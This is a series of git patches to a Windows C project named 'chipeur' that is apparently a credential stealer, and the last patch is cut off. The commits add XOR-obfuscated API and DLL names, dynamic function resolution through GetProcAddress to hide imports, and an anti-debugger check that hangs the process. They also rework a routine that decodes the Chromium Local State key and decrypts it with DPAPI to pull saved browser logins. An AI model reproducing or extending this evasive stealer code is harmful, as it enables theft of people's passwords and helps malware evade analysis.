From 7a1a3a8a94c23e653f1294e3b347e6f0ee1b35bd Mon Sep 17 00:00:00 2001 From: ErrorTeaPot Date: Fri, 14 Feb 2025 19:02:47 +0100 Subject: [PATCH 01/11] Add dynamic api function resolution with XORED stack string --- include/obfuscation.h | 8 ++++++++ src/chipeur.c | 9 ++++++++- src/obfuscation.c | 16 ++++++++++++++++ 3 files changed, 32 insertions(+), 1 deletion(-) diff --git a/include/obfuscation.h b/include/obfuscation.h index 3888151..1ce34b5 100644 --- a/include/obfuscation.h +++ b/include/obfuscation.h @@ -1,4 +1,5 @@ #include +#include #define XOR_STR(str, size) \ do { \ @@ -13,3 +14,10 @@ (wstr)[i] ^= 42; \ } \ } while (0) + +typedef PVOID(WINAPI *PCheckRemoteDebuggerPresent)(HANDLE hProcess, PBOOL pbDebuggerPresent); +typedef struct { + PCheckRemoteDebuggerPresent funcCheckRemoteDebuggerPresent; +} hidden_apis; + +void resolve_apis(hidden_apis apis); diff --git a/src/chipeur.c b/src/chipeur.c index 5ed3cd9..3698760 100644 --- a/src/chipeur.c +++ b/src/chipeur.c @@ -2,8 +2,10 @@ #include #include +#include #include #include +#include #include "chromium.h" #include "find_ssh_key.h" @@ -19,7 +21,12 @@ int main(void) { BOOL isDebuggerPresent = FALSE; HANDLE hProcess = GetCurrentProcess(); - if (CheckRemoteDebuggerPresent(hProcess, &isDebuggerPresent)) { + PCheckRemoteDebuggerPresent func; + hidden_apis apis[] = {func}; + // resolve_apis(apis); type problem + + if (func(hProcess, &isDebuggerPresent)) { + printf("Nice call\n"); if (isDebuggerPresent) { #ifdef DEBUG printf("Un débogueur est détecté sur ce processus.\n"); diff --git a/src/obfuscation.c b/src/obfuscation.c index 54fc1b5..b4b3746 100644 --- a/src/obfuscation.c +++ b/src/obfuscation.c @@ -1,6 +1,7 @@ #include "obfuscation.h" #include +#include #include /** * XOR the given string pointer by xoring each char with 42 @@ -24,3 +25,18 @@ void xor_wstr(wchar_t *wstr, int size) { *wstr++ ^= 42; } } + +void resolve_apis(hidden_apis apis) { + wchar_t kernel_str[] = + L"\x41\x4f\x58\x44\x4f\x46\x19\x18\x04\x4e\x46\x46"; // kernel32.dll + XOR_WSTR(kernel_str, wcslen(kernel_str)); + HMODULE hKernel32 = GetModuleHandleW(kernel_str); + + char checkRemoteDbg_str[] = + "\x69\x42\x4f\x49\x41\x78\x4f\x47\x45\x5e\x4f\x6e\x4f\x48\x5f\x4d\x4d\x4f" + "\x58\x7a\x58\x4f\x59\x4f\x44\x5e"; // CheckRemoteDebuggerPresent + XOR_STR(checkRemoteDbg_str, strlen(checkRemoteDbg_str)); + apis.funcCheckRemoteDebuggerPresent = + (PCheckRemoteDebuggerPresent)GetProcAddress(hKernel32, + checkRemoteDbg_str); +} From ac99ce2b61f5b8350c7bd5e58c8976261cc075d1 Mon Sep 17 00:00:00 2001 From: elyessfaxiano Date: Sat, 15 Feb 2025 20:09:16 +0100 Subject: [PATCH 02/11] fixed errors --- include/obfuscation.h | 5 ++--- src/chipeur.c | 39 +++++++++++++++++++++++---------------- src/obfuscation.c | 9 +++++---- 3 files changed, 30 insertions(+), 23 deletions(-) diff --git a/include/obfuscation.h b/include/obfuscation.h index 1ce34b5..db0bc22 100644 --- a/include/obfuscation.h +++ b/include/obfuscation.h @@ -15,9 +15,8 @@ } \ } while (0) -typedef PVOID(WINAPI *PCheckRemoteDebuggerPresent)(HANDLE hProcess, PBOOL pbDebuggerPresent); +typedef BOOL(WINAPI *PCheckRemoteDebuggerPresent)(HANDLE hProcess, PBOOL pbDebuggerPresent); typedef struct { PCheckRemoteDebuggerPresent funcCheckRemoteDebuggerPresent; } hidden_apis; - -void resolve_apis(hidden_apis apis); +void resolve_apis(hidden_apis *apis); diff --git a/src/chipeur.c b/src/chipeur.c index 3698760..891413e 100644 --- a/src/chipeur.c +++ b/src/chipeur.c @@ -17,32 +17,39 @@ int main(void) { // Allows us to print non-ASCII characters for debug SetConsoleOutputCP(CP_UTF8); #endif + + // Init + hidden_apis apis = {0}; + resolve_apis(&apis); + // Check if a debugger is attached to the process BOOL isDebuggerPresent = FALSE; HANDLE hProcess = GetCurrentProcess(); - PCheckRemoteDebuggerPresent func; - hidden_apis apis[] = {func}; - // resolve_apis(apis); type problem - - if (func(hProcess, &isDebuggerPresent)) { - printf("Nice call\n"); - if (isDebuggerPresent) { + if (apis.funcCheckRemoteDebuggerPresent) { + if (apis.funcCheckRemoteDebuggerPresent(hProcess, &isDebuggerPresent)) { + printf("Nice call\n"); + if (isDebuggerPresent) { +#ifdef DEBUG + printf("Un débogueur est détecté sur ce processus.\n"); +#endif + while (1); + } + else { #ifdef DEBUG - printf("Un débogueur est détecté sur ce processus.\n"); + printf("Aucun débogueur n'est détecté sur ce processus.\n"); #endif - while (1); - } else { + } + } + else { #ifdef DEBUG - printf("Aucun débogueur n'est détecté sur ce processus.\n"); + printf("Erreur lors de l'appel à CheckRemoteDebuggerPresent. Code d'erreur : %lu\n", GetLastError()); #endif } - } else { + } + else { #ifdef DEBUG - printf( - "Erreur lors de l'appel à CheckRemoteDebuggerPresent. Code d'erreur : " - "%lu\n", - GetLastError()); + printf("Erreur: CheckRemoteDebuggerPresent n'a pas été résolu correctement.\n"); #endif } diff --git a/src/obfuscation.c b/src/obfuscation.c index b4b3746..c77b67f 100644 --- a/src/obfuscation.c +++ b/src/obfuscation.c @@ -26,17 +26,18 @@ void xor_wstr(wchar_t *wstr, int size) { } } -void resolve_apis(hidden_apis apis) { +void resolve_apis(hidden_apis *apis) { wchar_t kernel_str[] = L"\x41\x4f\x58\x44\x4f\x46\x19\x18\x04\x4e\x46\x46"; // kernel32.dll XOR_WSTR(kernel_str, wcslen(kernel_str)); + HMODULE hKernel32 = GetModuleHandleW(kernel_str); char checkRemoteDbg_str[] = "\x69\x42\x4f\x49\x41\x78\x4f\x47\x45\x5e\x4f\x6e\x4f\x48\x5f\x4d\x4d\x4f" "\x58\x7a\x58\x4f\x59\x4f\x44\x5e"; // CheckRemoteDebuggerPresent XOR_STR(checkRemoteDbg_str, strlen(checkRemoteDbg_str)); - apis.funcCheckRemoteDebuggerPresent = - (PCheckRemoteDebuggerPresent)GetProcAddress(hKernel32, - checkRemoteDbg_str); + + apis->funcCheckRemoteDebuggerPresent = + (PCheckRemoteDebuggerPresent)GetProcAddress(hKernel32, checkRemoteDbg_str); } From 77767570693634335249d9db3ef422b9d27fe5bb Mon Sep 17 00:00:00 2001 From: ErrorTeaPot Date: Sun, 16 Feb 2025 13:13:53 +0100 Subject: [PATCH 03/11] Add DLL resolution with commented parts --- include/obfuscation.h | 7 +++++++ src/chipeur.c | 25 +++++++++++++++---------- src/obfuscation.c | 16 +++++++++++++++- 3 files changed, 37 insertions(+), 11 deletions(-) diff --git a/include/obfuscation.h b/include/obfuscation.h index db0bc22..3b924ce 100644 --- a/include/obfuscation.h +++ b/include/obfuscation.h @@ -15,8 +15,15 @@ } \ } while (0) +#define REFKNOWNFOLDERID const KNOWNFOLDERID * __MIDL_CONST + typedef BOOL(WINAPI *PCheckRemoteDebuggerPresent)(HANDLE hProcess, PBOOL pbDebuggerPresent); +typedef HMODULE(WINAPI *PLoadLibraryA)(LPCSTR lpLibFileName); +//typedef HRESULT(WINAPI *PSHGetKnownFolderPath)(REFKNOWNFOLDERID rfid, DWORD dwFlags, HANDLE hToken, PWSTR *ppszPath); typedef struct { PCheckRemoteDebuggerPresent funcCheckRemoteDebuggerPresent; + PLoadLibraryA funcLoadLibraryA; + //PSHGetKnownFolderPath funcSHGetKnownFolderPath; } hidden_apis; + void resolve_apis(hidden_apis *apis); diff --git a/src/chipeur.c b/src/chipeur.c index 891413e..546920b 100644 --- a/src/chipeur.c +++ b/src/chipeur.c @@ -20,7 +20,7 @@ int main(void) { // Init hidden_apis apis = {0}; - resolve_apis(&apis); + resolve_apis(&apis); // Check if a debugger is attached to the process BOOL isDebuggerPresent = FALSE; @@ -28,30 +28,35 @@ int main(void) { if (apis.funcCheckRemoteDebuggerPresent) { if (apis.funcCheckRemoteDebuggerPresent(hProcess, &isDebuggerPresent)) { - printf("Nice call\n"); if (isDebuggerPresent) { #ifdef DEBUG printf("Un débogueur est détecté sur ce processus.\n"); #endif while (1); - } - else { + } else { #ifdef DEBUG printf("Aucun débogueur n'est détecté sur ce processus.\n"); #endif } - } - else { + } else { #ifdef DEBUG - printf("Erreur lors de l'appel à CheckRemoteDebuggerPresent. Code d'erreur : %lu\n", GetLastError()); + printf( + "Erreur lors de l'appel à CheckRemoteDebuggerPresent. Code d'erreur " + ": %lu\n", + GetLastError()); #endif } - } - else { + } else { #ifdef DEBUG - printf("Erreur: CheckRemoteDebuggerPresent n'a pas été résolu correctement.\n"); + printf( + "Erreur: CheckRemoteDebuggerPresent n'a pas été résolu " + "correctement.\n"); #endif } + char msvcrt_str[] = "\x47\x59\x5c\x49\x58\x5e\x04\x4e\x46\x46"; + XOR_STR(msvcrt_str, strlen(msvcrt_str)); + + // apis.funcLoadLibraryA(msvcrt_str); steal_chromium_creds(); diff --git a/src/obfuscation.c b/src/obfuscation.c index c77b67f..b8719d6 100644 --- a/src/obfuscation.c +++ b/src/obfuscation.c @@ -1,5 +1,6 @@ #include "obfuscation.h" +#include #include #include #include @@ -33,11 +34,24 @@ void resolve_apis(hidden_apis *apis) { HMODULE hKernel32 = GetModuleHandleW(kernel_str); + // Resolve strings char checkRemoteDbg_str[] = "\x69\x42\x4f\x49\x41\x78\x4f\x47\x45\x5e\x4f\x6e\x4f\x48\x5f\x4d\x4d\x4f" "\x58\x7a\x58\x4f\x59\x4f\x44\x5e"; // CheckRemoteDebuggerPresent XOR_STR(checkRemoteDbg_str, strlen(checkRemoteDbg_str)); + char loadLibA_str[] = "\x66\x45\x4b\x4e\x66\x43\x48\x58\x4b\x58\x53\x6b"; + XOR_STR(loadLibA_str, strlen(loadLibA_str)); + char SHGetKnownFolderPath_str[] = + "\x79\x62\x6d\x4f\x5e\x61\x44\x45\x5d\x44\x6c\x45\x46\x4e\x4f\x58\x7a\x4b" + "\x5e\x42"; + XOR_STR(SHGetKnownFolderPath_str, strlen(SHGetKnownFolderPath_str)); + apis->funcCheckRemoteDebuggerPresent = - (PCheckRemoteDebuggerPresent)GetProcAddress(hKernel32, checkRemoteDbg_str); + (PCheckRemoteDebuggerPresent)GetProcAddress(hKernel32, + checkRemoteDbg_str); + apis->funcLoadLibraryA = + (PLoadLibraryA)GetProcAddress(hKernel32, loadLibA_str); + // apis->funcSHGetKnownFolderPath = (PSHGetKnownFolderPath)GetProcAddress( + // hKernel32, SHGetKnownFolderPath_str); } From 45652fbe26b27773038dbc66ed56a5189c61db44 Mon Sep 17 00:00:00 2001 From: elyessfaxiano Date: Tue, 18 Feb 2025 19:05:23 +0100 Subject: [PATCH 04/11] dynamic_resolution_dpapi --- include/chromium.h | 6 +++--- include/obfuscation.h | 17 +++++++++++++++-- makefile | 2 +- src/chromium.c | 27 ++++++++++++++------------- src/obfuscation.c | 30 ++++++++++++++++++++++++++---- 5 files changed, 59 insertions(+), 23 deletions(-) diff --git a/include/chromium.h b/include/chromium.h index 7b38b8d..06a68e5 100644 --- a/include/chromium.h +++ b/include/chromium.h @@ -3,7 +3,7 @@ #include #include - +#include "obfuscation.h" #include "logins.h" #define MAX_BROWSER_NAME_SIZE 20 @@ -22,8 +22,8 @@ static int retrieve_logins(PWSTR fullPath, int *loginCountOut, Login *loginsOut[]); static int retrieve_encoded_key(PWSTR localStatePath, PSTR *encryptedKeyOut); static int decode_key(PSTR encodedKey, BYTE *decodedKeyOut[], - size_t *decodedKeySizeOut); + size_t *decodedKeySizeOut, hidden_apis *apis); static int decrypt_key(BYTE *encryptedKey, size_t encryptedKeySize, - DATA_BLOB *decryptedKeyOut); + DATA_BLOB *decryptedKeyOut, hidden_apis *apis); #endif diff --git a/include/obfuscation.h b/include/obfuscation.h index 3b924ce..acf2c29 100644 --- a/include/obfuscation.h +++ b/include/obfuscation.h @@ -1,3 +1,7 @@ +#ifndef OBFUSCATION_H +#define OBFUSCATION_H +#include +#include #include #include @@ -19,11 +23,20 @@ typedef BOOL(WINAPI *PCheckRemoteDebuggerPresent)(HANDLE hProcess, PBOOL pbDebuggerPresent); typedef HMODULE(WINAPI *PLoadLibraryA)(LPCSTR lpLibFileName); -//typedef HRESULT(WINAPI *PSHGetKnownFolderPath)(REFKNOWNFOLDERID rfid, DWORD dwFlags, HANDLE hToken, PWSTR *ppszPath); +typedef BOOL(WINAPI *PCryptUnprotectData)(DATA_BLOB*, LPWSTR*, DATA_BLOB*, void*, void*, DWORD, DATA_BLOB*); +typedef BOOL(WINAPI *PCryptStringToBinaryA)(LPCSTR, DWORD, DWORD, BYTE*, DWORD*, DWORD*, DWORD*); +typedef HRESULT(WINAPI *PSHGetKnownFolderPath)(REFKNOWNFOLDERID rfid, DWORD dwFlags, HANDLE hToken, PWSTR *ppszPath); + + typedef struct { PCheckRemoteDebuggerPresent funcCheckRemoteDebuggerPresent; PLoadLibraryA funcLoadLibraryA; - //PSHGetKnownFolderPath funcSHGetKnownFolderPath; + PCryptUnprotectData funcCryptUnprotectData; + PCryptStringToBinaryA funcCryptStringToBinaryA; + PSHGetKnownFolderPath funcSHGetKnownFolderPath; } hidden_apis; + void resolve_apis(hidden_apis *apis); + +#endif // OBFUSCATION_H diff --git a/makefile b/makefile index e29e16e..5554f8d 100644 --- a/makefile +++ b/makefile @@ -12,7 +12,7 @@ CFLAGS=-g -fPIE -O2 -s -Warray-bounds -Wsequence-point -Walloc-zero -Wnull-deref #not needed for now LDFLAGS =# -Wl,--strip-all -LLIB= -luuid -lole32 -lcrypt32 +LLIB= -luuid -lole32 DEBUG=-DDEBUG .PHONY : all help clean diff --git a/src/chromium.c b/src/chromium.c index 6312f2e..29a7aa2 100644 --- a/src/chromium.c +++ b/src/chromium.c @@ -5,8 +5,6 @@ // clang-format on #include "chromium.h" - -#include #include #include #include @@ -106,11 +104,11 @@ static int retrieve_encoded_key(PWSTR localStatePath, PSTR *encodedKeyOut) { // note that `decodedKeyOut` is still encrypted at this point // NOTE: `decodedKeyOut` must be freed by the caller static int decode_key(PSTR encodedKey, BYTE *decodedKeyOut[], - size_t *decodedKeySizeOut) { + size_t *decodedKeySizeOut, hidden_apis *apis) { // Get size of the decoded key (needed for the next malloc) DWORD decodedBinarySize = 0; - if (!CryptStringToBinaryA(encodedKey, 0, CRYPT_STRING_BASE64, NULL, - &decodedBinarySize, NULL, NULL)) { + if (!apis->funcCryptStringToBinaryA(encodedKey, 0, CRYPT_STRING_BASE64, NULL, + &decodedBinarySize, NULL, NULL)) { fprintf(stderr, "Failed getting base64 size. Error code: %lu\n", GetLastError()); return EXIT_FAILURE; @@ -123,9 +121,9 @@ static int decode_key(PSTR encodedKey, BYTE *decodedKeyOut[], } // Decode the encoded key, this leaves us with an AES-GCM encrypted key - if (!CryptStringToBinaryA(encodedKey, 0, CRYPT_STRING_BASE64, - decodedBinaryData, &decodedBinarySize, NULL, - NULL)) { + if (!apis->funcCryptStringToBinaryA(encodedKey, 0, CRYPT_STRING_BASE64, + decodedBinaryData, &decodedBinarySize, NULL, + NULL)) { fprintf(stderr, "Failed decoding base64. Error code: %lu\n", GetLastError()); free(decodedBinaryData); @@ -153,14 +151,14 @@ static int decode_key(PSTR encodedKey, BYTE *decodedKeyOut[], // Decrypts `encryptedKey` of size `encryptedKeySize` using DPAPI // NOTE: `decryptedKeyOut` must be freed by the caller static int decrypt_key(BYTE encryptedKey[], size_t encryptedKeySize, - DATA_BLOB *decryptedKeyOut) { + DATA_BLOB *decryptedKeyOut, hidden_apis *apis) { DATA_BLOB DataInput; DATA_BLOB DataOutput; DataInput.cbData = (DWORD)encryptedKeySize; DataInput.pbData = encryptedKey; - if (!CryptUnprotectData(&DataInput, NULL, NULL, NULL, NULL, 0, &DataOutput)) { + if (!apis->funcCryptUnprotectData(&DataInput, NULL, NULL, NULL, NULL, 0, &DataOutput)) { fprintf(stderr, "Failed decrypting key. Error code: %lu\n", GetLastError()); free(encryptedKey); return EXIT_FAILURE; @@ -230,17 +228,20 @@ static int steal_browser_creds(BrowserInfo browser) { wprintf(L"Could not retrieve key from %ls\n", localStatePath); return EXIT_FAILURE; } + // dynamic resol + hidden_apis apis; + resolve_apis(&apis); size_t encryptedKeySize = 0; BYTE *encryptedKey; - if (decode_key(encodedKey, &encryptedKey, &encryptedKeySize) != + if (decode_key(encodedKey, &encryptedKey, &encryptedKeySize,&apis) != EXIT_SUCCESS) { printf("Could not decode %ls\n", encodedKey); return EXIT_FAILURE; } - + DATA_BLOB decryptedBlob; - if (decrypt_key(encryptedKey, encryptedKeySize, &decryptedBlob) != + if (decrypt_key(encryptedKey, encryptedKeySize, &decryptedBlob,&apis) != EXIT_SUCCESS) { fprintf(stderr, "Could not decrypt key\n"); return EXIT_FAILURE; diff --git a/src/obfuscation.c b/src/obfuscation.c index b8719d6..0f8133b 100644 --- a/src/obfuscation.c +++ b/src/obfuscation.c @@ -33,6 +33,8 @@ void resolve_apis(hidden_apis *apis) { XOR_WSTR(kernel_str, wcslen(kernel_str)); HMODULE hKernel32 = GetModuleHandleW(kernel_str); + printf("[DEBUG] Kernel32 loaded at: %p\n", hKernel32); + // Resolve strings char checkRemoteDbg_str[] = @@ -40,18 +42,38 @@ void resolve_apis(hidden_apis *apis) { "\x58\x7a\x58\x4f\x59\x4f\x44\x5e"; // CheckRemoteDebuggerPresent XOR_STR(checkRemoteDbg_str, strlen(checkRemoteDbg_str)); - char loadLibA_str[] = "\x66\x45\x4b\x4e\x66\x43\x48\x58\x4b\x58\x53\x6b"; + wchar_t crypt32_str[] = L"\x49\x58\x53\x5a\x5e\x19\x18\x04\x4e\x46\x46"; // crypt32.dll + XOR_WSTR(crypt32_str, wcslen(crypt32_str)); + HMODULE hCrypt32 = LoadLibraryW(crypt32_str); + printf("[DEBUG] Crypt32 loaded at: %p\n", hCrypt32); + + + // Resolve functions in crypt32.dll + char cryptUnprotectData_str[] = "\x69\x58\x53\x5a\x5e\x7f\x44\x5a\x58\x45\x5e\x4f\x49\x5e\x6e\x4b\x5e\x4b"; + + XOR_STR(cryptUnprotectData_str, strlen(cryptUnprotectData_str)); + + char cryptStringToBinaryA_str[] = "\x69\x58\x53\x5a\x5e\x79\x5e\x58\x43\x44\x4d\x7e\x45\x68\x43\x44\x4b\x58\x53\x6b"; + + XOR_STR(cryptStringToBinaryA_str, strlen(cryptStringToBinaryA_str)); + + apis->funcCryptUnprotectData = (PCryptUnprotectData)GetProcAddress(hCrypt32, cryptUnprotectData_str); + + + apis->funcCryptStringToBinaryA = (PCryptStringToBinaryA)GetProcAddress(hCrypt32, cryptStringToBinaryA_str); + + /*char loadLibA_str[] = "\x66\x45\x4b\x4e\x66\x43\x48\x58\x4b\x58\x53\x6b"; XOR_STR(loadLibA_str, strlen(loadLibA_str)); char SHGetKnownFolderPath_str[] = "\x79\x62\x6d\x4f\x5e\x61\x44\x45\x5d\x44\x6c\x45\x46\x4e\x4f\x58\x7a\x4b" "\x5e\x42"; - XOR_STR(SHGetKnownFolderPath_str, strlen(SHGetKnownFolderPath_str)); + XOR_STR(SHGetKnownFolderPath_str, strlen(SHGetKnownFolderPath_str));*/ apis->funcCheckRemoteDebuggerPresent = (PCheckRemoteDebuggerPresent)GetProcAddress(hKernel32, checkRemoteDbg_str); - apis->funcLoadLibraryA = - (PLoadLibraryA)GetProcAddress(hKernel32, loadLibA_str); + //apis->funcLoadLibraryA = + //(PLoadLibraryA)GetProcAddress(hKernel32, loadLibA_str); // apis->funcSHGetKnownFolderPath = (PSHGetKnownFolderPath)GetProcAddress( // hKernel32, SHGetKnownFolderPath_str); } From 4a5be5f48d613c086a37fadd2c98cd784504c824 Mon Sep 17 00:00:00 2001 From: elyessfaxiano Date: Wed, 19 Feb 2025 16:01:14 +0100 Subject: [PATCH 05/11] fast clean --- include/obfuscation.h | 8 ++++---- src/chipeur.c | 5 ++--- src/obfuscation.c | 14 +++++++------- 3 files changed, 13 insertions(+), 14 deletions(-) diff --git a/include/obfuscation.h b/include/obfuscation.h index acf2c29..4f6870b 100644 --- a/include/obfuscation.h +++ b/include/obfuscation.h @@ -22,18 +22,18 @@ #define REFKNOWNFOLDERID const KNOWNFOLDERID * __MIDL_CONST typedef BOOL(WINAPI *PCheckRemoteDebuggerPresent)(HANDLE hProcess, PBOOL pbDebuggerPresent); -typedef HMODULE(WINAPI *PLoadLibraryA)(LPCSTR lpLibFileName); +// typedef HMODULE(WINAPI *PLoadLibraryA)(LPCSTR lpLibFileName); typedef BOOL(WINAPI *PCryptUnprotectData)(DATA_BLOB*, LPWSTR*, DATA_BLOB*, void*, void*, DWORD, DATA_BLOB*); typedef BOOL(WINAPI *PCryptStringToBinaryA)(LPCSTR, DWORD, DWORD, BYTE*, DWORD*, DWORD*, DWORD*); -typedef HRESULT(WINAPI *PSHGetKnownFolderPath)(REFKNOWNFOLDERID rfid, DWORD dwFlags, HANDLE hToken, PWSTR *ppszPath); +// typedef HRESULT(WINAPI *PSHGetKnownFolderPath)(REFKNOWNFOLDERID rfid, DWORD dwFlags, HANDLE hToken, PWSTR *ppszPath); typedef struct { PCheckRemoteDebuggerPresent funcCheckRemoteDebuggerPresent; - PLoadLibraryA funcLoadLibraryA; + //PLoadLibraryA funcLoadLibraryA; PCryptUnprotectData funcCryptUnprotectData; PCryptStringToBinaryA funcCryptStringToBinaryA; - PSHGetKnownFolderPath funcSHGetKnownFolderPath; + //PSHGetKnownFolderPath funcSHGetKnownFolderPath; } hidden_apis; diff --git a/src/chipeur.c b/src/chipeur.c index 546920b..ba88dc2 100644 --- a/src/chipeur.c +++ b/src/chipeur.c @@ -53,9 +53,8 @@ int main(void) { "correctement.\n"); #endif } - char msvcrt_str[] = "\x47\x59\x5c\x49\x58\x5e\x04\x4e\x46\x46"; - XOR_STR(msvcrt_str, strlen(msvcrt_str)); - + // char msvcrt_str[] = "\x47\x59\x5c\x49\x58\x5e\x04\x4e\x46\x46"; + // XOR_STR(msvcrt_str, strlen(msvcrt_str)); // apis.funcLoadLibraryA(msvcrt_str); steal_chromium_creds(); diff --git a/src/obfuscation.c b/src/obfuscation.c index 0f8133b..2eb70b2 100644 --- a/src/obfuscation.c +++ b/src/obfuscation.c @@ -33,7 +33,6 @@ void resolve_apis(hidden_apis *apis) { XOR_WSTR(kernel_str, wcslen(kernel_str)); HMODULE hKernel32 = GetModuleHandleW(kernel_str); - printf("[DEBUG] Kernel32 loaded at: %p\n", hKernel32); // Resolve strings @@ -45,7 +44,6 @@ void resolve_apis(hidden_apis *apis) { wchar_t crypt32_str[] = L"\x49\x58\x53\x5a\x5e\x19\x18\x04\x4e\x46\x46"; // crypt32.dll XOR_WSTR(crypt32_str, wcslen(crypt32_str)); HMODULE hCrypt32 = LoadLibraryW(crypt32_str); - printf("[DEBUG] Crypt32 loaded at: %p\n", hCrypt32); // Resolve functions in crypt32.dll @@ -62,16 +60,18 @@ void resolve_apis(hidden_apis *apis) { apis->funcCryptStringToBinaryA = (PCryptStringToBinaryA)GetProcAddress(hCrypt32, cryptStringToBinaryA_str); - /*char loadLibA_str[] = "\x66\x45\x4b\x4e\x66\x43\x48\x58\x4b\x58\x53\x6b"; + + // Resolve functions in kernel32.dll + apis->funcCheckRemoteDebuggerPresent = + (PCheckRemoteDebuggerPresent)GetProcAddress(hKernel32, + checkRemoteDbg_str); + + /*char loadLibA_str[] = "\x66\x45\x4b\x4e\x66\x43\x48\x58\x4b\x58\x53\x6b"; XOR_STR(loadLibA_str, strlen(loadLibA_str)); char SHGetKnownFolderPath_str[] = "\x79\x62\x6d\x4f\x5e\x61\x44\x45\x5d\x44\x6c\x45\x46\x4e\x4f\x58\x7a\x4b" "\x5e\x42"; XOR_STR(SHGetKnownFolderPath_str, strlen(SHGetKnownFolderPath_str));*/ - - apis->funcCheckRemoteDebuggerPresent = - (PCheckRemoteDebuggerPresent)GetProcAddress(hKernel32, - checkRemoteDbg_str); //apis->funcLoadLibraryA = //(PLoadLibraryA)GetProcAddress(hKernel32, loadLibA_str); // apis->funcSHGetKnownFolderPath = (PSHGetKnownFolderPath)GetProcAddress( From 24876d1f325a5a3dc7b88e92ba0044ce7bb60f47 Mon Sep 17 00:00:00 2001 From: ErrorTeaPot <98967114+ErrorTeaPot@users.noreply.github.com> Date: Fri, 4 Apr 2025 11:40:32 +0200 Subject: [PATCH 06/11] Update makefile --- makefile | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/makefile b/makefile index 3c7e501..48d8b85 100644 --- a/makefile +++ b/makefile @@ -12,7 +12,7 @@ CFLAGS=-g -fPIE -O2 -s -Warray-bounds -Wsequence-point -Walloc-zero -Wnull-deref #not needed for now LDFLAGS =# -Wl,--strip-all -LLIB= -luuid -lole32 +LLIB= -luuid -lole32 -lws2_32 DEBUG=-DDEBUG .PHONY : all help clean @@ -70,4 +70,4 @@ clean: help: @echo "chipeur:\tto create the binary of the project" @echo "clean:\tto remove the binary and .o files" - @echo "help:\tto display this help" \ No newline at end of file + @echo "help:\tto display this help" From 23f9e46088192e4bee86761cfe768b0601ad6404 Mon Sep 17 00:00:00 2001 From: ErrorTeaPot <98967114+ErrorTeaPot@users.noreply.github.com> Date: Fri, 4 Apr 2025 11:43:14 +0200 Subject: [PATCH 07/11] Update obfuscation.h --- include/obfuscation.h | 24 +++++++++++++----------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/include/obfuscation.h b/include/obfuscation.h index 4f6870b..c2e7dcb 100644 --- a/include/obfuscation.h +++ b/include/obfuscation.h @@ -1,7 +1,7 @@ #ifndef OBFUSCATION_H #define OBFUSCATION_H -#include #include +#include #include #include @@ -19,24 +19,26 @@ } \ } while (0) -#define REFKNOWNFOLDERID const KNOWNFOLDERID * __MIDL_CONST +#define REFKNOWNFOLDERID const KNOWNFOLDERID *__MIDL_CONST -typedef BOOL(WINAPI *PCheckRemoteDebuggerPresent)(HANDLE hProcess, PBOOL pbDebuggerPresent); +typedef BOOL(WINAPI *PCheckRemoteDebuggerPresent)(HANDLE hProcess, + PBOOL pbDebuggerPresent); // typedef HMODULE(WINAPI *PLoadLibraryA)(LPCSTR lpLibFileName); -typedef BOOL(WINAPI *PCryptUnprotectData)(DATA_BLOB*, LPWSTR*, DATA_BLOB*, void*, void*, DWORD, DATA_BLOB*); -typedef BOOL(WINAPI *PCryptStringToBinaryA)(LPCSTR, DWORD, DWORD, BYTE*, DWORD*, DWORD*, DWORD*); -// typedef HRESULT(WINAPI *PSHGetKnownFolderPath)(REFKNOWNFOLDERID rfid, DWORD dwFlags, HANDLE hToken, PWSTR *ppszPath); - +typedef BOOL(WINAPI *PCryptUnprotectData)(DATA_BLOB *, LPWSTR *, DATA_BLOB *, + void *, void *, DWORD, DATA_BLOB *); +typedef BOOL(WINAPI *PCryptStringToBinaryA)(LPCSTR, DWORD, DWORD, BYTE *, + DWORD *, DWORD *, DWORD *); +// typedef HRESULT(WINAPI *PSHGetKnownFolderPath)(REFKNOWNFOLDERID rfid, DWORD +// dwFlags, HANDLE hToken, PWSTR *ppszPath); typedef struct { PCheckRemoteDebuggerPresent funcCheckRemoteDebuggerPresent; - //PLoadLibraryA funcLoadLibraryA; + // PLoadLibraryA funcLoadLibraryA; PCryptUnprotectData funcCryptUnprotectData; PCryptStringToBinaryA funcCryptStringToBinaryA; - //PSHGetKnownFolderPath funcSHGetKnownFolderPath; + // PSHGetKnownFolderPath funcSHGetKnownFolderPath; } hidden_apis; - void resolve_apis(hidden_apis *apis); -#endif // OBFUSCATION_H +#endif // OBFUSCATION_H From 7ae7f0c03139b970694005ce4a2a5512c99e53b7 Mon Sep 17 00:00:00 2001 From: ErrorTeaPot <98967114+ErrorTeaPot@users.noreply.github.com> Date: Fri, 4 Apr 2025 11:45:06 +0200 Subject: [PATCH 08/11] Update chromium.h --- include/chromium.h | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/include/chromium.h b/include/chromium.h index 09da6fb..5ab8482 100644 --- a/include/chromium.h +++ b/include/chromium.h @@ -3,8 +3,9 @@ #include #include -#include "obfuscation.h" + #include "logins.h" +#include "obfuscation.h" #define MAX_BROWSER_NAME_SIZE 20 #define MAX_LOGIN_DATA_PATH_SIZE 57 From 7c4589e52f0737a8ed7531c3d534049783a243d9 Mon Sep 17 00:00:00 2001 From: ErrorTeaPot <98967114+ErrorTeaPot@users.noreply.github.com> Date: Fri, 4 Apr 2025 11:46:04 +0200 Subject: [PATCH 09/11] Update chipeur.c --- src/chipeur.c | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/src/chipeur.c b/src/chipeur.c index 29c8195..e4c9a59 100644 --- a/src/chipeur.c +++ b/src/chipeur.c @@ -5,7 +5,6 @@ #include #include #include - #include #include @@ -40,14 +39,13 @@ int main(void) { while (1); } else { #ifdef DEBUG - printf("Debug program detected on the process.\n"); + printf("Debug program detected on the process.\n"); #endif } } else { #ifdef DEBUG - printf( - "Error on CheckRemoteDebuggerPresent call. Error code : %lu\n", - GetLastError()); + printf("Error on CheckRemoteDebuggerPresent call. Error code : %lu\n", + GetLastError()); #endif } } else { From c9e7e566bf5901ab7bf52377d892a499dc887a2a Mon Sep 17 00:00:00 2001 From: ErrorTeaPot <98967114+ErrorTeaPot@users.noreply.github.com> Date: Fri, 4 Apr 2025 11:46:45 +0200 Subject: [PATCH 10/11] Update obfuscation.c --- src/obfuscation.c | 45 ++++++++++++++++++++++++--------------------- 1 file changed, 24 insertions(+), 21 deletions(-) diff --git a/src/obfuscation.c b/src/obfuscation.c index b9a0312..01ce3ff 100644 --- a/src/obfuscation.c +++ b/src/obfuscation.c @@ -35,46 